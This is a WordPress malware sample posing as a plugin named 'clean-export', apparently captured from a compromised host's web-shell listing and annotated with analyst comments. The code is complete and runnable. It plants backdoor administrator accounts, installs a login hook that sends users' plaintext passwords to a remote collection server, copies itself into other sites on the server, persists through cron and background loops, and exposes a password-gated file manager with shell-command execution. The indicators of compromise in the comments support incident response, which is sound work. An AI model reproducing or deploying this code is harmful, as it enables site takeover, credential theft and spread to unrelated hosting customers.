$plugin = <<403WebShell
403Webshell
Server IP : 147.79.119.151  /  Your IP : 216.73.216.214
Web Server : LiteSpeed
System : Linux fr-int-web1513.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u766115111 ( 766115111)
PHP Version : 8.2.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /dev/shm/


Current File : /dev/shm/.19c9cfc5.php
<?php
/**
 * Plugin Name: clean-export
 * Version: 1.0
 */
/* logpro v2 — Harvester + Persistence + Spread  |  gate: ?root=admin888 */
// Analyst note: error reporting is switched off, the execution time limit is
// removed and the memory limit is raised to 512M before any other stage runs.
// Together with the @ operators used below, this leaves little for the PHP error
// log to record, so do not rely on it as evidence that this file executed.
error_reporting(0);set_time_limit(0);@ini_set('memory_limit','512M');

// ── Admin auto-create ──
// Analyst note: this stage writes WordPress administrator accounts straight into
// the site database. Logins are 'adminlin' and 'admin_lin', the password is
// 'admin_lin' (stored as a bcrypt hash) and every row uses the e-mail a@a.com.
// Triage: search the users table for those logins or that e-mail, and the
// usermeta table for administrator capabilities on accounts nobody provisioned.
$XU=['adminlin','admin_lin'];$XP='admin_lin';
// Candidate roots: the document root and its parent, this file's directory and
// its parent, and the current working directory (duplicates removed).
$XR=@array_unique(@array_merge(
    [$_SERVER['DOCUMENT_ROOT']??'',dirname($_SERVER['DOCUMENT_ROOT']??''),dirname(__FILE__),dirname(dirname(__FILE__))],
    [getcwd()?:'']
));
foreach($XR as $XB){
    // Each root is probed as-is and with /wp, /wordpress and /html appended.
    foreach([$XB,$XB.'/wp',$XB.'/wordpress',$XB.'/html'] as $XX){
        $XC=$XX.'/wp-config.php';if(!@file_exists($XC))continue;
        $XS=@file_get_contents($XC);if(!$XS)continue;
        // Database name, user, password, host and table prefix are pulled out of
        // wp-config.php by pattern matching. Any wp-config.php readable by this
        // account should be treated as disclosed and its DB password rotated.
        @preg_match("/'DB_NAME'\\\\s*,\\\\s*'(.*?)'/",$XS,$XN);
        @preg_match("/'DB_USER'\\\\s*,\\\\s*'(.*?)'/",$XS,$XW);
        @preg_match("/'DB_PASSWORD'\\\\s*,\\\\s*'(.*?)'/",$XS,$XZ);
        @preg_match("/'DB_HOST'\\\\s*,\\\\s*'(.*?)'/",$XS,$XH);
        @preg_match("/\\\\\\$table_prefix\\\\s*=\\\\s*'(.*?)'/",$XS,$XT);
        if(!isset($XN[1],$XW[1],$XZ[1],$XH[1]))continue;
        // Without the mysqli extension the whole stage is abandoned.
        if(!class_exists('mysqli'))break 2;
        @mysqli_report(MYSQLI_REPORT_OFF);
        // Table prefix falls back to 'wp_' when none was captured.
        $XTP=isset($XT[1])?$XT[1]:'wp_';
        $XHP=@password_hash($XP,PASSWORD_BCRYPT);
        $HST=$XH[1];$PORT=null;$SOCK=null;
        // A DB_HOST containing ':/' is split into host and socket path.
        if(strpos($XH[1],':/')!==false){list($HST,$SOCK)=explode(':',$XH[1],2);}
        $XM=@new mysqli($HST,$XW[1],$XZ[1],$XN[1],$PORT,$SOCK);
        if(@$XM->connect_error)continue;
        foreach($XU as $XUN){
            // Inserts the account; ON DUPLICATE KEY UPDATE overwrites the password
            // hash of a row that collides with the insert.
            @$XM->query("INSERT INTO {$XTP}users (user_login,user_pass,user_nicename,user_email,user_registered,display_name) VALUES ('$XUN','$XHP','$XUN','a@a.com',NOW(),'$XUN') ON DUPLICATE KEY UPDATE user_pass='$XHP'");
            $XQ=@$XM->query("SELECT ID FROM {$XTP}users WHERE user_login='$XUN'");
            if($XQ&&($XO=$XQ->fetch_object())){
                $XID=$XO->ID;
                // The two usermeta rows grant the administrator role and user level 10.
                @$XM->query("INSERT INTO {$XTP}usermeta (user_id,meta_key,meta_value) VALUES ($XID,'{$XTP}capabilities','a:1:{s:13:\"administrator\";b:1;}') ON DUPLICATE KEY UPDATE meta_value='a:1:{s:13:\"administrator\";b:1;}'");
                @$XM->query("INSERT INTO {$XTP}usermeta (user_id,meta_key,meta_value) VALUES ($XID,'{$XTP}user_level','10') ON DUPLICATE KEY UPDATE meta_value='10'");
            }
        }
        // Only the first database that accepts the connection is modified.
        $XM->close();break 2;
    }
}

// ── Credential Harvester ──
// Analyst note: $HV is the source text of a second PHP file, not code that runs
// here. Once dropped into a WordPress tree it registers a wp_login action that
// reads the submitted password from $_POST["pwd"], joins it with the site URL and
// the login name, and sends the result as a GET request to the collection URL in
// $C2 (file name dbsync_okip_<server address>.txt). The request is issued three
// times with an 8 second timeout.
// Indicators: outbound HTTP to 45.61.187.50 port 50001, and files named
// .db-cache.php under wp-content/mu-plugins/ or wp-content/upgrade/.
// Response: passwords of every account that logged in while the hook was
// installed should be treated as exposed and reset.
$C2='http://45.61.187.50:50001/siteall/data.php';
$HV='<?php if(!defined("ABSPATH")||!function_exists("add_action"))return;';
$HV.='add_action("wp_login",function($l,$u){';
$HV.='$ip=$_SERVER["SERVER_ADDR"]??"127.0.0.1";';
$HV.='$s=function_exists("home_url")?home_url():$_SERVER["HTTP_HOST"];';
$HV.='$pw=$_POST["pwd"]??"";';
$HV.='$d=$s."/wp-login.php,".$l.",".$pw;';
$HV.='$url="'.$C2.'?name=dbsync_okip_".$ip.".txt&data=".urlencode($d);';
$HV.='$ctx=stream_context_create(["http"=>["timeout"=>8,"ignore_errors"=>true]]);';
$HV.='for($i=0;$i<3;$i++){@file_get_contents($url,false,$ctx);usleep(50000);}';
$HV.='},10,2);';
// Same root list and sub-directory probing as the admin stage above. The hook is
// written only where the target file does not exist yet; mu-plugins is the
// must-use plugin directory, which WordPress loads without activation, so the
// file will not appear as an activatable plugin in the admin UI.
foreach($XR as $XB){
    foreach([$XB,$XB.'/wp',$XB.'/wordpress',$XB.'/html'] as $XX){
        $XCFG=$XX.'/wp-config.php';if(!@file_exists($XCFG))continue;
        $H1=$XX.'/wp-content/mu-plugins/.db-cache.php';
        if(!@file_exists($H1)){@mkdir(dirname($H1),0777,true);@file_put_contents($H1,$HV);}
        $H2=$XX.'/wp-content/upgrade/.db-cache.php';
        if(!@file_exists($H2)){@mkdir(dirname($H2),0777,true);@file_put_contents($H2,$HV);}
    }
}

// ── Server-wide Spread ──
/**
 * Analyst note: recursive directory walk that copies a payload into every
 * WordPress content directory it can reach.
 *
 * $D  directory to scan
 * $DP remaining recursion depth; the walk stops when it reaches 0
 * $CD file content written at each drop location
 *
 * Drop locations, relative to each directory named wp-content:
 *   mu-plugins/.sys-db.php, upgrade/.sys-db.php, and in plugins/ the first
 *   unused name among .cache-opt.php, .db-init.php, .idx-clean.php,
 *   .log-rot.php, .tmp-flush.php.
 * Existing files are never overwritten. All of these are dotfiles, so sweep with
 * a listing that includes hidden entries.
 */
function XSD($D,$DP,$CD){
    if($DP<=0)return;
    try{
        $IT=@scandir($D);if(!$IT)return;
        foreach($IT as $I){
            if($I=='.'||$I=='..')continue;
            $P=$D.'/'.$I;
            if($I=='wp-content'&&is_dir($P)){
                // Missing directories are created with mode 0777; a world-writable
                // mu-plugins or upgrade directory is itself worth flagging.
                $M1=$P.'/mu-plugins/.sys-db.php';
                if(!@file_exists($M1)){@mkdir(dirname($M1),0777,true);@file_put_contents($M1,$CD);@chmod($M1,0644);}
                $M2=$P.'/upgrade/.sys-db.php';
                if(!@file_exists($M2)){@mkdir(dirname($M2),0777,true);@file_put_contents($M2,$CD);}
                $PL=$P.'/plugins/';
                if(is_dir($PL)){
                    // One file per plugins/ directory per run: the loop stops after
                    // the first name that was free.
                    $NS=['.cache-opt.php','.db-init.php','.idx-clean.php','.log-rot.php','.tmp-flush.php'];
                    foreach($NS as $NM){$PP=$PL.$NM;if(!@file_exists($PP)){@file_put_contents($PP,$CD);break;}}
                }
            }elseif(is_dir($P)){XSD($P,$DP-1,$CD);}
        }
    }catch(\Exception $e){}
}
// Analyst note: the payload handed to XSD() is this file's own source, so every
// drop location holds a full copy of the script. The walk starts from the listed
// hosting base directories with a depth of 3, which means sites belonging to
// other accounts on the same server are in scope wherever file permissions allow
// the write. Scope the clean-up per server, not per site.
$SF=realpath(__FILE__)?:__FILE__;$SC=@file_get_contents($SF);
if($SC){
    foreach(['/home','/homepages','/kunden','/var/www','/www','/htdocs','/data'] as $B){
        if(is_dir($B))XSD($B,3,$SC);
    }
}

// ── Persistence ──
// Analyst note: three mechanisms keep the file in place: hidden backup copies, a
// background bash loop, and cron entries. Each one restores the others, so
// removal has to cover all of them in one pass; deleting only the script is
// undone within minutes.
// Artifacts to look for (8 and 6 hex characters come from the MD5 of the path):
//   /dev/shm/.<name>, /tmp/.<name>, /var/tmp/.<name>, /dev/shm/.<8 hex>.php
//   /dev/shm/.<8 hex>_d and /dev/shm/.<8 hex>_d.lock   (loop script and its lock)
//   /dev/shm/.ct<6 hex>                                 (temporary crontab file)
//   /etc/cron.d/wp-<8 hex>, plus lines in the account's own crontab
// The path shown in this listing's header, /dev/shm/.19c9cfc5.php, fits the
// /dev/shm/.<8 hex>.php pattern.
try{
    $BN=basename($SF);
    $BC=['/dev/shm/.'.$BN,'/tmp/.'.$BN,'/dev/shm/.'.substr(md5($SF),0,8).'.php','/var/tmp/.'.$BN];
    foreach($BC as $B){@file_put_contents($B,$SC);@chmod($B,0644);}
    $WD='/dev/shm/.'.substr(md5($SF),0,8).'_d';$LK=$WD.'.lock';
    // Generated bash script: takes an flock on the lock file so a single instance
    // runs, then loops with a 300 to 479 second sleep, copying a backup over the
    // original path when it is missing and re-creating the first two backups.
    $SH="#!/bin/bash\nexec 200>\"$LK\" && flock -n 200 || exit 0\nwhile :; do\n  sleep \$((300+RANDOM%180))\n";
    foreach($BC as $B){
        $SH.="  [ ! -f ".escapeshellarg($SF)." ] && [ -f ".escapeshellarg($B)." ] && cp ".escapeshellarg($B)." ".escapeshellarg($SF)." 2>/dev/null\n";
    }
    $SH.="  [ -f ".escapeshellarg($BC[0])." ] || cp ".escapeshellarg($SF)." ".escapeshellarg($BC[0])." 2>/dev/null\n";
    $SH.="  [ -f ".escapeshellarg($BC[1])." ] || cp ".escapeshellarg($SF)." ".escapeshellarg($BC[1])." 2>/dev/null\ndone";
    @file_put_contents($WD,$SH);@chmod($WD,0755);
    // The loop is started detached through whichever process functions exist.
    // Check the process list for a bash process running a /dev/shm dotfile.
    if(function_exists('exec')){@exec('nohup '.escapeshellarg($WD).' >/dev/null 2>&1 &');@exec('(' .escapeshellarg($WD).' </dev/null >/dev/null 2>&1 &)');}
    if(function_exists('system'))@system('nohup '.escapeshellarg($WD).' >/dev/null 2>&1 &');
    if(function_exists('popen'))@popen('nohup '.escapeshellarg($WD).' >/dev/null 2>&1 &','r');
    // Cron lines: every five minutes restore the script from the first backup if
    // it is missing; at reboot, wait 60 seconds and restart the loop.
    $CL='*/5 * * * * (test -f '.escapeshellarg($SF).' || cp '.escapeshellarg($BC[0]).' '.escapeshellarg($SF).') 2>/dev/null'."\n";
    $CL.='@reboot (sleep 60 && nohup '.escapeshellarg($WD).' >/dev/null 2>&1 &)'."\n";
    // Appended to the account's crontab only when the current crontab could be
    // read and does not already mention this file's name.
    $OLD=@shell_exec('crontab -l 2>/dev/null');
    if($OLD!==null&&is_string($OLD)&&strpos($OLD,$BN)===false){
        $TMP='/dev/shm/.ct'.substr(md5($SF),0,6);
        @file_put_contents($TMP,$OLD.$CL);
        @exec('crontab '.escapeshellarg($TMP).' 2>/dev/null');
        @unlink($TMP);
    }
    // System-wide cron entry running as root; the write is attempted regardless
    // and presumably succeeds only if the PHP process may write to /etc/cron.d.
    @file_put_contents('/etc/cron.d/wp-'.substr(md5($SF),0,8),
        '*/5 * * * * root (test -f '.escapeshellarg($SF).' || cp '.escapeshellarg($BC[0]).' '.escapeshellarg($SF).') 2>/dev/null'."\n");
}catch(\Exception $e){}

// ── Shutdown regenerate ──
// Analyst note: runs at the end of every request that loads this file. If the
// file was removed while the request was in flight it is copied back from the
// /dev/shm or /tmp backup. The touch() calls reset the modification time of the
// script and both backups on each hit, so mtime reflects the most recent request
// and cannot be used to date the initial compromise.
register_shutdown_function(function(){
    $SELF=realpath(__FILE__)?:__FILE__;
    if(!@file_exists($SELF)){
        foreach(['/dev/shm/.'.basename($SELF),'/tmp/.'.basename($SELF)] as $B){
            if(@file_exists($B)){@copy($B,$SELF);break;}
        }
    }
    @touch($SELF);@touch('/dev/shm/.'.basename($SELF));@touch('/tmp/.'.basename($SELF));
});

// ── Gate: request parameter root must equal admin888 ──
// Analyst note: the section title in the sample read "?check=verify888", but the
// condition below tests $_REQUEST['root'] against 'admin888', matching the header
// comment at the top of the file. Requests without it get an empty 404.
// The gate protects only the file manager that follows; the account creation,
// harvester drop, spread and persistence stages above have already run by the
// time this line is reached, on any request that loads the file.
// Log hunting: requests to hidden .php files that carry root=admin888, and 404
// responses for paths that exist on disk.
if(!isset($_REQUEST['root'])||$_REQUEST['root']!=='admin888'){http_response_code(404);die();}

// ── File Manager API ──
// Analyst note: JSON endpoint behind the gate. The action name arrives in _a, the
// target path in _p and the payload in c. No path restriction is applied, so the
// reach is whatever the PHP process user can read and write.
// Actions: ls list directory, rd read file, sv write file, dl delete file,
// up write base64-decoded upload, mk create directory (mode 0777), sh run the
// c parameter through shell_exec, exec or system, whichever exists.
// Log hunting: POST requests carrying an _a field to a hidden .php file.
if(isset($_REQUEST['_a'])){
    $A=$_REQUEST['_a'];$P=$_REQUEST['_p']??'';$R=[];
    switch($A){
    // ls returns name, type (d/f), size in KiB and the last four octal mode digits.
    case'ls':$I=@scandir($P);if($I)foreach($I as $F){if($F=='.'||$F=='..')continue;$FP=$P.'/'.$F;$R[]=['n'=>$F,'t'=>is_dir($FP)?'d':'f','s'=>round(@filesize($FP)/1024,2).'K','m'=>substr(sprintf('%o',@fileperms($FP)),-4)];}break;
    case'rd':$R['d']=@file_get_contents($P);break;
    case'sv':$R['o']=@file_put_contents($P,$_REQUEST['c'])?'Saved':'Fail';break;
    case'dl':$R['o']=@unlink($P)?'Done':'Fail';break;
    case'up':$R['o']=@file_put_contents($P,base64_decode($_REQUEST['c']))?'Uploaded':'Fail';break;
    case'mk':$R['o']=@mkdir($P,0777,true)?'Created':'Fail';break;
    case'sh':
        // Command output, stderr included, is returned in the 'r' field.
        $CMD=$_REQUEST['c'];
        if(function_exists('shell_exec'))$R['r']=shell_exec($CMD.' 2>&1');
        elseif(function_exists('exec')){exec($CMD.' 2>&1',$X);$R['r']=implode("\n",$X);}
        elseif(function_exists('system')){ob_start();system($CMD.' 2>&1');$R['r']=ob_get_clean();}
        else $R['r']='no exec';
        break;
    case'spread':XSD;$R['o']='Spread done';break;
    }
    header('Content-Type: application/json');die(json_encode($R));
}
// Analyst note: the HTML and script that follow the PHP closing tag are the
// browser front end for this endpoint. It sends the _a, _p and c fields as a
// form POST to the page's own URL and renders the JSON replies.
?><!DOCTYPE html><html><head><meta charset="UTF-8"><title>v2</title>
<style>*{margin:0;padding:0;box-sizing:border-box}body{background:#1a1a2e;color:#e0e0e0;font:13px/1.5 monospace;padding:12px}.hd{display:flex;align-items:center;gap:10px;margin-bottom:10px;padding:8px 12px;background:#16213e;border-radius:6px}.btn{background:#0f3460;color:#e94560;border:1px solid #e94560;padding:5px 12px;cursor:pointer;border-radius:4px;font:inherit}.btn:hover{background:#e94560;color:#fff}.btn-g{background:#1a3a1a;border-color:#00ff88;color:#00ff88}.btn-g:hover{background:#00ff88;color:#000}.it{display:flex;align-items:center;padding:5px 10px;border-bottom:1px solid #16213e;cursor:pointer;gap:8px}.it:hover{background:#16213e}.it .n{flex:1;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.it .s{color:#888;width:70px;text-align:right;font-size:11px}.it .m{color:#666;width:45px;text-align:right;font-size:10px}.it .del{color:#ff4444;cursor:pointer;font-weight:bold;margin-left:8px}.dir{color:#e94560}.file{color:#00ff88}#ed{width:100%;height:420px;background:#0a0a1a;color:#e0e0e0;border:1px solid #0f3460;padding:10px;font:inherit;display:none;resize:vertical}#eb{display:none;margin-top:8px}#upf{display:none}</style></head><body>
<div class="hd"><span id="cw"></span><button class="btn" onclick="nv('..')">UP</button><button class="btn btn-g" onclick="document.getElementById('upf').click()">UPLOAD</button><input type="file" id="upf" onchange="_up(this)"></div><div id="lst"></div><div id="eb"><textarea id="ed"></textarea><br><button class="btn btn-g" onclick="_sv()">SAVE</button><button class="btn" onclick="_cl()">CLOSE</button></div>
<script>var _cur='<?=addslashes(getcwd())?>',_af='';async function _api(o){var fd=new FormData();for(var k in o)fd.append(k,o[k]);var r=await fetch('',{method:'POST',body:fd});return await r.json()}function _ld(p){_cur=p;document.getElementById('cw').innerText=p;_api({_a:'ls',_p:p}).then(function(r){var h='';if(Array.isArray(r)){r.sort(function(a,b){return a.t=='d'?-1:1});r.forEach(function(i){h+='<div class="it"><span class="n '+(i.t=='d'?'dir':'file')+'" onclick="_hl(\''+i.n+'\',\''+i.t+'\')">'+(i.t=='d'?'[DIR]':'[  ]')+' '+i.n+'</span><span class="m">'+i.m+'</span><span class="s">'+i.s+'</span><span class="del" onclick="_dl(\''+p+'/'+i.n+'\')">X</span></div>'})}document.getElementById('lst').innerHTML=h;_cl()})}function _hl(n,t){var p=_cur+'/'+n;if(t=='d')_ld(p);else{_af=p;_api({_a:'rd',_p:p}).then(function(r){document.getElementById('ed').value=r.d;document.getElementById('ed').style.display='block';document.getElementById('eb').style.display='block';document.getElementById('lst').style.display='none'})}}function _up(i){var f=i.files[0];if(!f)return;var r=new FileReader();r.onload=function(e){_api({_a:'up',_p:_cur+'/'+f.name,c:btoa(e.target.result)}).then(function(r){alert(r.o);_ld(_cur)})};r.readAsBinaryString(f)}function _sv(){_api({_a:'sv',_p:_af,c:document.getElementById('ed').value}).then(function(r){alert(r.o)})}function _dl(p){if(confirm('Delete '+p+'?'))_api({_a:'dl',_p:p}).then(function(r){alert(r.o);_ld(_cur)})}function _cl(){document.getElementById('ed').style.display='none';document.getElementById('eb').style.display='none';document.getElementById('lst').style.display='block'}function nv(d){var s='/',p=_cur.split(s);if(d=='..')p.pop();_ld(p.join(s)||s)}_ld(_cur);</script></body></html>

Youez - 2016 - github.com/yon3zu
LinuXploit